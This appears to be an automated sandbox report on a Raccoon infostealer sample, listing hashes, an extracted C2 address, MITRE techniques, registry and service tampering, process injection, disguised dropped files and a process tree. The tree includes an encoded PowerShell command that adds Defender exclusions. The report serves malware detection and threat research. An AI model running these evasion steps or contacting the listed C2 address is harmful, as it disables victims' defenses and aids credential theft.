raccoon | c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d

Analysis

max time kernel
150s
max time network
146s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
08-09-2022 10:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe
Size

379KB
MD5

06f7b1a3af6a67252c707f260a031c57
SHA1

3fee890a57a4fd651f9263472fa73115bbfe03d5
SHA256

c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d
SHA512

6925ef7f3943890650c3250489eda05e16c62f76212a6329790f9e3d013a08e765e739806f78f19429a2fa045ab82cd6078d6d545e7144a554cd46261ea740fe
SSDEEP

6144:KbI21ai1wnZ0KtvusH5n4NGSaSVLKlJmqork5jruMJ3Pqe9Pcr6J:6IXi1wZ0KtvusH5n4NGSaSVutruMJ3Nj

Score

10^/10

raccoon 654b3e7f2d409dcde795b5d2dacf4955 discovery evasion exploit spyware stealer

Malware Config

Extracted

Family

raccoon

Botnet

654b3e7f2d409dcde795b5d2dacf4955

http://46.249.58.152/

rc4.plain

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

powershell.EXEsvchost.exepowershell.EXE

description	pid	process	target process
PID 4468 created 568	4468	powershell.EXE	winlogon.exe
PID 4696 created 4004	4696	svchost.exe	DllHost.exe
PID 4696 created 3748	4696	svchost.exe	DllHost.exe
PID 4484 created 568	4484	powershell.EXE	winlogon.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Executes dropped EXE 4 IoCs

Processes:

U2g2ZBA3.execonhost.exeupdate.exedialer.exe

pid process

2952 U2g2ZBA3.exe
2540 conhost.exe
3772 update.exe
5024 dialer.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

3068 takeown.exe
3404 icacls.exe
4932 takeown.exe
4044 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 3 IoCs

Processes:

AppLaunch.exe

pid process

2892 AppLaunch.exe
2892 AppLaunch.exe
2892 AppLaunch.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

3068 takeown.exe
3404 icacls.exe
4932 takeown.exe
4044 icacls.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2952	U2g2ZBA3.exe
2540	conhost.exe
3772	update.exe
5024	dialer.exe

pid	process
3068	takeown.exe
3404	icacls.exe
4932	takeown.exe
4044	icacls.exe

pid	process
2892	AppLaunch.exe
2892	AppLaunch.exe
2892	AppLaunch.exe

pid	process
3068	takeown.exe
3404	icacls.exe
4932	takeown.exe
4044	icacls.exe

Drops file in System32 directory 9 IoCs

Processes:

OfficeClickToRun.exepowershell.EXEconhost.exepowershell.EXEpowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\7782.tmp	conhost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log	conhost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 5 IoCs

Processes:

c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.execonhost.exepowershell.EXEpowershell.EXEconhost.exe

description	pid	process	target process
PID 2556 set thread context of 2892	2556	c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe	AppLaunch.exe
PID 4376 set thread context of 2540	4376	conhost.exe	conhost.exe
PID 4468 set thread context of 3556	4468	powershell.EXE	dllhost.exe
PID 4484 set thread context of 4864	4484	powershell.EXE	dllhost.exe
PID 2932 set thread context of 5024	2932	conhost.exe	dialer.exe

Drops file in Program Files directory 3 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File created	C:\Program Files\Platform\Defender\update.exe	conhost.exe
File opened for modification	C:\Program Files\Platform\Defender\update.exe	conhost.exe
File created	C:\Program Files\Google\Libs\WR64.sys	conhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3744 sc.exe
4420 sc.exe
4560 sc.exe
2912 sc.exe
3680 sc.exe
4572 sc.exe
4540 sc.exe
1772 sc.exe
1032 sc.exe
2804 sc.exe
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

5092 3748 WerFault.exe DllHost.exe
2364 4004 WerFault.exe DllHost.exe

pid	process
3744	sc.exe
4420	sc.exe
4560	sc.exe
2912	sc.exe
3680	sc.exe
4572	sc.exe
4540	sc.exe
1772	sc.exe
1032	sc.exe
2804	sc.exe

pid	pid_target	process	target process
5092	3748	WerFault.exe	DllHost.exe
2364	4004	WerFault.exe	DllHost.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXEOfficeClickToRun.exepowershell.exepowershell.execonhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1662641809"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1404	reg.exe
188	reg.exe
420	reg.exe
4884	reg.exe
1852	reg.exe
592	reg.exe
1772	reg.exe
1272	reg.exe
396	reg.exe
4704	reg.exe
2828	reg.exe
4404	reg.exe
4540	reg.exe
2892	reg.exe
1892	reg.exe
2072	reg.exe
3092	reg.exe
4540	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.execonhost.exepowershell.EXEdllhost.exe

pid	process
4256	powershell.exe
4256	powershell.exe
4256	powershell.exe
3832	powershell.exe
3832	powershell.exe
3832	powershell.exe
4376	conhost.exe
4468	powershell.EXE
4468	powershell.EXE
4468	powershell.EXE
4468	powershell.EXE
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3104 Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

624

pid	process
3104	Explorer.EXE

pid	process
624

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	4256	powershell.exe
Token: SeIncreaseQuotaPrivilege	4256	powershell.exe
Token: SeSecurityPrivilege	4256	powershell.exe
Token: SeTakeOwnershipPrivilege	4256	powershell.exe
Token: SeLoadDriverPrivilege	4256	powershell.exe
Token: SeSystemProfilePrivilege	4256	powershell.exe
Token: SeSystemtimePrivilege	4256	powershell.exe
Token: SeProfSingleProcessPrivilege	4256	powershell.exe
Token: SeIncBasePriorityPrivilege	4256	powershell.exe
Token: SeCreatePagefilePrivilege	4256	powershell.exe
Token: SeBackupPrivilege	4256	powershell.exe
Token: SeRestorePrivilege	4256	powershell.exe
Token: SeShutdownPrivilege	4256	powershell.exe
Token: SeDebugPrivilege	4256	powershell.exe
Token: SeSystemEnvironmentPrivilege	4256	powershell.exe
Token: SeRemoteShutdownPrivilege	4256	powershell.exe
Token: SeUndockPrivilege	4256	powershell.exe
Token: SeManageVolumePrivilege	4256	powershell.exe
Token: 33	4256	powershell.exe
Token: 34	4256	powershell.exe
Token: 35	4256	powershell.exe
Token: 36	4256	powershell.exe
Token: SeShutdownPrivilege	4364	powercfg.exe
Token: SeCreatePagefilePrivilege	4364	powercfg.exe
Token: SeShutdownPrivilege	4476	powercfg.exe
Token: SeCreatePagefilePrivilege	4476	powercfg.exe
Token: SeShutdownPrivilege	584	powercfg.exe
Token: SeCreatePagefilePrivilege	584	powercfg.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeShutdownPrivilege	3300	powercfg.exe
Token: SeCreatePagefilePrivilege	3300	powercfg.exe
Token: SeTakeOwnershipPrivilege	3068	takeown.exe
Token: SeIncreaseQuotaPrivilege	3832	powershell.exe
Token: SeSecurityPrivilege	3832	powershell.exe
Token: SeTakeOwnershipPrivilege	3832	powershell.exe
Token: SeLoadDriverPrivilege	3832	powershell.exe
Token: SeSystemProfilePrivilege	3832	powershell.exe
Token: SeSystemtimePrivilege	3832	powershell.exe
Token: SeProfSingleProcessPrivilege	3832	powershell.exe
Token: SeIncBasePriorityPrivilege	3832	powershell.exe
Token: SeCreatePagefilePrivilege	3832	powershell.exe
Token: SeBackupPrivilege	3832	powershell.exe
Token: SeRestorePrivilege	3832	powershell.exe
Token: SeShutdownPrivilege	3832	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeSystemEnvironmentPrivilege	3832	powershell.exe
Token: SeRemoteShutdownPrivilege	3832	powershell.exe
Token: SeUndockPrivilege	3832	powershell.exe
Token: SeManageVolumePrivilege	3832	powershell.exe
Token: 33	3832	powershell.exe
Token: 34	3832	powershell.exe
Token: 35	3832	powershell.exe
Token: 36	3832	powershell.exe
Token: SeIncreaseQuotaPrivilege	3832	powershell.exe
Token: SeSecurityPrivilege	3832	powershell.exe
Token: SeTakeOwnershipPrivilege	3832	powershell.exe
Token: SeLoadDriverPrivilege	3832	powershell.exe
Token: SeSystemProfilePrivilege	3832	powershell.exe
Token: SeSystemtimePrivilege	3832	powershell.exe
Token: SeProfSingleProcessPrivilege	3832	powershell.exe
Token: SeIncBasePriorityPrivilege	3832	powershell.exe
Token: SeCreatePagefilePrivilege	3832	powershell.exe
Token: SeBackupPrivilege	3832	powershell.exe
Token: SeRestorePrivilege	3832	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

dwm.exe

pid process

980 dwm.exe
980 dwm.exe

pid	process
980	dwm.exe
980	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exeAppLaunch.exeU2g2ZBA3.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 2556 wrote to memory of 2892	2556	c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe	AppLaunch.exe
PID 2556 wrote to memory of 2892	2556	c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe	AppLaunch.exe
PID 2556 wrote to memory of 2892	2556	c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe	AppLaunch.exe
PID 2556 wrote to memory of 2892	2556	c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe	AppLaunch.exe
PID 2556 wrote to memory of 2892	2556	c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe	AppLaunch.exe
PID 2892 wrote to memory of 2952	2892	AppLaunch.exe	U2g2ZBA3.exe
PID 2892 wrote to memory of 2952	2892	AppLaunch.exe	U2g2ZBA3.exe
PID 2952 wrote to memory of 4376	2952	U2g2ZBA3.exe	conhost.exe
PID 2952 wrote to memory of 4376	2952	U2g2ZBA3.exe	conhost.exe
PID 2952 wrote to memory of 4376	2952	U2g2ZBA3.exe	conhost.exe
PID 4376 wrote to memory of 4256	4376	conhost.exe	powershell.exe
PID 4376 wrote to memory of 4256	4376	conhost.exe	powershell.exe
PID 4376 wrote to memory of 5080	4376	conhost.exe	cmd.exe
PID 4376 wrote to memory of 5080	4376	conhost.exe	cmd.exe
PID 4376 wrote to memory of 5064	4376	conhost.exe	cmd.exe
PID 4376 wrote to memory of 5064	4376	conhost.exe	cmd.exe
PID 5080 wrote to memory of 4420	5080	cmd.exe	sc.exe
PID 5080 wrote to memory of 4420	5080	cmd.exe	sc.exe
PID 4376 wrote to memory of 3832	4376	conhost.exe	powershell.exe
PID 4376 wrote to memory of 3832	4376	conhost.exe	powershell.exe
PID 5064 wrote to memory of 4364	5064	cmd.exe	powercfg.exe
PID 5064 wrote to memory of 4364	5064	cmd.exe	powercfg.exe
PID 5080 wrote to memory of 4560	5080	cmd.exe	sc.exe
PID 5080 wrote to memory of 4560	5080	cmd.exe	sc.exe
PID 5080 wrote to memory of 4540	5080	cmd.exe	sc.exe
PID 5080 wrote to memory of 4540	5080	cmd.exe	sc.exe
PID 5064 wrote to memory of 4476	5064	cmd.exe	powercfg.exe
PID 5064 wrote to memory of 4476	5064	cmd.exe	powercfg.exe
PID 5080 wrote to memory of 1772	5080	cmd.exe	sc.exe
PID 5080 wrote to memory of 1772	5080	cmd.exe	sc.exe
PID 5064 wrote to memory of 584	5064	cmd.exe	powercfg.exe
PID 5064 wrote to memory of 584	5064	cmd.exe	powercfg.exe
PID 5064 wrote to memory of 3300	5064	cmd.exe	powercfg.exe
PID 5064 wrote to memory of 3300	5064	cmd.exe	powercfg.exe
PID 5080 wrote to memory of 1032	5080	cmd.exe	sc.exe
PID 5080 wrote to memory of 1032	5080	cmd.exe	sc.exe
PID 5080 wrote to memory of 1272	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 1272	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 396	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 396	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 1852	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 1852	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 592	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 592	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 4704	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 4704	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 3068	5080	cmd.exe	takeown.exe
PID 5080 wrote to memory of 3068	5080	cmd.exe	takeown.exe
PID 5080 wrote to memory of 3404	5080	cmd.exe	icacls.exe
PID 5080 wrote to memory of 3404	5080	cmd.exe	icacls.exe
PID 5080 wrote to memory of 1404	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 1404	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 1892	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 1892	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 2828	5080	cmd.exe	reg.exe
PID 5080 wrote to memory of 2828	5080	cmd.exe	reg.exe
PID 4376 wrote to memory of 2540	4376	conhost.exe	conhost.exe
PID 4376 wrote to memory of 2540	4376	conhost.exe	conhost.exe
PID 4376 wrote to memory of 2540	4376	conhost.exe	conhost.exe
PID 4376 wrote to memory of 2300	4376	conhost.exe	cmd.exe
PID 4376 wrote to memory of 2300	4376	conhost.exe	cmd.exe
PID 4376 wrote to memory of 2212	4376	conhost.exe	cmd.exe
PID 4376 wrote to memory of 2212	4376	conhost.exe	cmd.exe
PID 5080 wrote to memory of 2072	5080	cmd.exe	reg.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:632

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:568

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of FindShellTrayWindow
PID:980

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{07738010-f620-4a17-b728-c875746ec0c3}
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3556

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{cd0277fa-fb41-40dc-9e65-26d645b44772}
2⤵
PID:4864

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:896

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:300

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:860

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:432

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:724

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:888

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2920

C:\Program Files\Platform\Defender\update.exe
"C:\Program Files\Platform\Defender\update.exe"
2⤵
- Executes dropped EXE
PID:3772

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Platform\Defender\update.exe"
3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:2932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3536

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4064

C:\Windows\System32\cmd.exe
